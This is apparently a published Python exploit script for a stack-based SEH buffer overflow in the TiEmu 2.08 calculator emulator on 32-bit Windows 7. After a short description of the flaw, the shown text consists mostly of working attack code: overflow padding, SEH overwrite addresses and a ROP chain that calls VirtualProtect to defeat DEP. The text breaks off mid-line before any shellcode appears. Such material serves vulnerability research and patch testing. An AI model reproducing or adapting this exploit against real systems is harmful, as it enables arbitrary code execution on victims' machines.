#!/usr/bin/python # Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com # Developed using Exploit Pack - http://exploitpack.com - # Tested on: Windows 7 32 bits # # Description: TiEmu ( Texas Instrument Emulator ) 2.08 and prior is # prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # What is TiEmu? # TiEmu is a multi-platform emulator for TI89 / TI89 Titanium / TI92 / TI92+ / V200PLT hand-helds. # # An attacker could exploit this vulnerability to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: http://lpg.ticalc.org/prj_tiemu/ import struct, subprocess, os file = "C:/Program Files/TiEmu/bin/tiemu.exe" junk = "A" * 452 nseh = struct.pack('L', 0x06eb9090) seh = struct.pack('L', 0x6c3010ba) # pop ebx # pop ebp # ret - libtifiles2-5.dll def create_rop_chain(): rop_gadgets = [ 0x75ecd264, # POP ECX # RETN [SHELL32.DLL] 0x711e1388, # ptr to &VirtualProtect() [IAT COMCTL32.DLL] 0x7549fd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll] 0x628daecc, # POP EBP # RETN [tcl84.dll] 0x76c319b8, # & push esp # ret [kernel32.dll] 0x7606c311, # POP EAX # RETN [SHELL32.DLL] 0xfffffdff, # Value to negate, will become 0x00000201 0x75de6a90, # NEG EAX # RETN [SHLWAPI.dll] 0x76c389d9, # XCHG EAX,EBX # RETN [kernel32.dll] 0x754f3b2f, # POP EAX # RETN [MSCTF.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x76b13193, # NEG EAX # RETN [USER32.dll] 0x76c38a09, # XCHG EAX,EDX # RETN [kernel32.dll] 0x757dfbf7, # POP ECX # RETN [ole32.dll] 0x71256c9b, # &Writable location [COMCTL32.DLL] 0x77048567, # POP EDI # RETN [RPCRT4.dll] 0x757e65e2, # RETN (ROP NOP) [ole32.dll] 0x76cd6ee4, # POP EAX # RETN [kernel32.dll] 0x90909090, # nop 0x76ac6d21, # PUSHAD # RETN [OLEAUT32.dll] ] return ''.join(struct.pack('